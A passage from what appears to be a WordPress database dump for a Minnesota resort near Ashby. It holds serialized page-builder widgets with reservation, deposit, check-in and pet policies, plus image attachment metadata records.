of 4 or less  All Daytime (Not Overnight) Guests $5.00 each  Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875%  ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.  PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.<br />\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION.  ALL DEPOSITS ARE NON-REFUNDABLE.</p>\n<p>A 3% PROCESSING FEE WILL BE ADDED FOR ALL CREDIT AND DEBIT CARD USAGE.</p>\n<p>CHECK IN TIME IS AFTER 3:00PM  <strong>NO</strong> EXCEPTIONS !!  CHECK OUT TIME IS BEFORE 10:00AM, <strong>NO</strong> exceptions !!<br />\nPets on a leash are welcome in all campsites ( 2 pets per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more than 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND.  Call to set up reservations for Hunting and Ice fishing.</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1563228778737\";s:22:\"so_sidebar_emulator_id\";s:18:\"sow-editor-4310002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:18:\"sow-editor-4310003\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2897,904,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:392:\"Call us at 218-747-2959 for reservations \n<strong>NO checkins after 10:00 PM !!</strong>\n\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  BALANCE IS DUE UPON ARRIVAL.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW.\nA 3% FEE WILL BE CHARGED FOR ALL CREDIT AND DEBIT CARD USAGE.\nALL GUESTS MUST CHECK IN AT THE RESORT OFFICE UPON ARRIVAL.\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1567111750426\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-90410000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:1;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-90410001\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:897:\"<p>ALL Cabins and Motel rooms are NON smoking !!</p>\n<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less  All Daytime (Not Overnight) Guests $5.00 each  Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875%  ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.  PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.</p>\n<p>CHECK IN TIME IS AFTER 3:00PM  <strong>NO</strong> EXCEPTIONS !!  CHECK OUT TIME IS BEFORE 10:00AM, <strong>NO</strong> exceptions !!</p>\n<p>Pets on a leash are welcome in all campsites ( 2 pets per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more than 50 miles from Ashby!</p>\n<p>MOTEL OPEN YEAR ROUND.  Call to set up reservations for Hunting and Ice fishing.</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1567111797665\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-90410002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-90410003\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2904,906,'_wp_attached_file','2019/09/67072529_2515261668537703_1982736171473567744_n.jpg'),(2905,906,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:59:\"2019/09/67072529_2515261668537703_1982736171473567744_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"67072529_2515261668537703_1982736171473567744_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:59:\"67072529_2515261668537703_1982736171473567744_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:59:\"67072529_2515261668537703_1982736171473567744_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2906,907,'_wp_attached_file','2019/09/67100561_2515261195204417_6786517591511793664_n.jpg'),(2907,907,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:59:\"2019/09/67100561_2515261195204417_6786517591511793664_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"67100561_2515261195204417_6786517591511793664_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:59:\"67100561_2515261195204417_6786517591511793664_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:59:\"67100561_2515261195204417_6786517591511793664_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2908,908,'_wp_attached_file','2019/09/67194205_2527420727321797_6395069238452682752_n.jpg'),(2909,908,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:59:\"2019/09/67194205_2527420727321797_6395069238452682752_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"67194205_2527420727321797_6395069238452682752_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:59:\"67194205_2527420727321797_6395069238452682752_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:59:\"67194205_2527420727321797_6395069238452682752_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2910,909,'_wp_attached_file','2019/09/67328366_2527420747321795_418456610654912512_n.jpg'),(2911,909,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:58:\"2019/09/67328366_2527420747321795_418456610654912512_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"67328366_2527420747321795_418456610654912512_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:58:\"67328366_2527420747321795_418456610654912512_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:58:\"67328366_2527420747321795_418456610654912512_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2912,910,'_wp_attached_file','2019/09/67352508_2527420803988456_3782830344743419904_n.jpg'),(2913,910,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:59:\"2019/09/67352508_2527420803988456_3782830344743419904_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"67352508_2527420803988456_3782830344743419904_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:59:\"67352508_2527420803988456_3782830344743419904_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:59:\"67352508_2527420803988456_3782830344743419904_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2914,911,'_wp_attached_file','2019/09/67354008_2515260805204456_2096376990331305984_n.jpg'),(2915,911,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:59:\"2019/09/67354008_2515260805204456_2096376990331305984_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"67354008_2515260805204456_2096376990331305984_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:59:\"67354008_2515260805204456_2096376990331305984_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:59:\"67354008_2515260805204456_2096376990331305984_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2916,912,'_wp_attached_file','2019/09/67664725_2541790915884778_4081940006199885824_n.jpg'),(2917,912,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:59:\"2019/09/67664725_2541790915884778_4081940006199885824_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"67664725_2541790915884778_4081940006199885824_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:59:\"67664725_2541790915884778_4081940006199885824_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:59:\"67664725_2541790915884778_4081940006199885824_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2918,913,'_wp_attached_file','2019/09/68430101_2559605910769945_1401026565407506432_n.jpg'),(2919,913,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:59:\"2019/09/68430101_2559605910769945_1401026565407506432_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"68430101_2559605910769945_1401026565407506432_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:59:\"68430101_2559605910769945_1401026565407506432_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:59:\"68430101_2559605910769945_1401026565407506432_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2920,914,'_wp_attached_file','2019/09/68746823_2568210933242776_9006306614507995136_n.jpg'),(2921,914,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:59:\"2019/09/68746823_2568210933242776_9006306614507995136_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"68746823_2568210933242776_9006306614507995136_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:59:\"68746823_2568210933242776_9006306614507995136_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:59:\"68746823_2568210933242776_9006306614507995136_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2922,915,'_wp_attached_file','2019/09/69157175_2573526889377847_7240689118680711168_n.jpg'),(2923,915,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:59:\"2019/09/69157175_2573526889377847_7240689118680711168_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"69157175_2573526889377847_7240689118680711168_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:59:\"69157175_2573526889377847_7240689118680711168_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:59:\"69157175_2573526889377847_7240689118680711168_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2924,916,'_wp_attached_file','2019/09/69361252_2574110649319471_116474079933890560_n.jpg'),(2925,916,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:58:\"2019/09/69361252_2574110649319471_116474079933890560_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"69361252_2574110649319471_116474079933890560_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:58:\"69361252_2574110649319471_116474079933890560_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:58:\"69361252_2574110649319471_116474079933890560_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2926,917,'_wp_attached_file','2019/09/69664187_2573526932711176_8178756056831229952_n.jpg'),(2927,917,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:59:\"2019/09/69664187_2573526932711176_8178756056831229952_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"69664187_2573526932711176_8178756056831229952_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:59:\"69664187_2573526932711176_8178756056831229952_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:59:\"69664187_2573526932711176_8178756056831229952_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2929,918,'_wp_attached_file','2019/09/67100561_2515261195204417_6786517591511793664_n-1.jpg'),(2930,918,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:61:\"2019/09/67100561_2515261195204417_6786517591511793664_n-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"67100561_2515261195204417_6786517591511793664_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:61:\"67100561_2515261195204417_6786517591511793664_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:61:\"67100561_2515261195204417_6786517591511793664_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2931,919,'_wp_attached_file','2019/09/67194205_2527420727321797_6395069238452682752_n-1.jpg'),(2932,919,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:61:\"2019/09/67194205_2527420727321797_6395069238452682752_n-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"67194205_2527420727321797_6395069238452682752_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:61:\"67194205_2527420727321797_6395069238452682752_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:61:\"67194205_2527420727321797_6395069238452682752_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";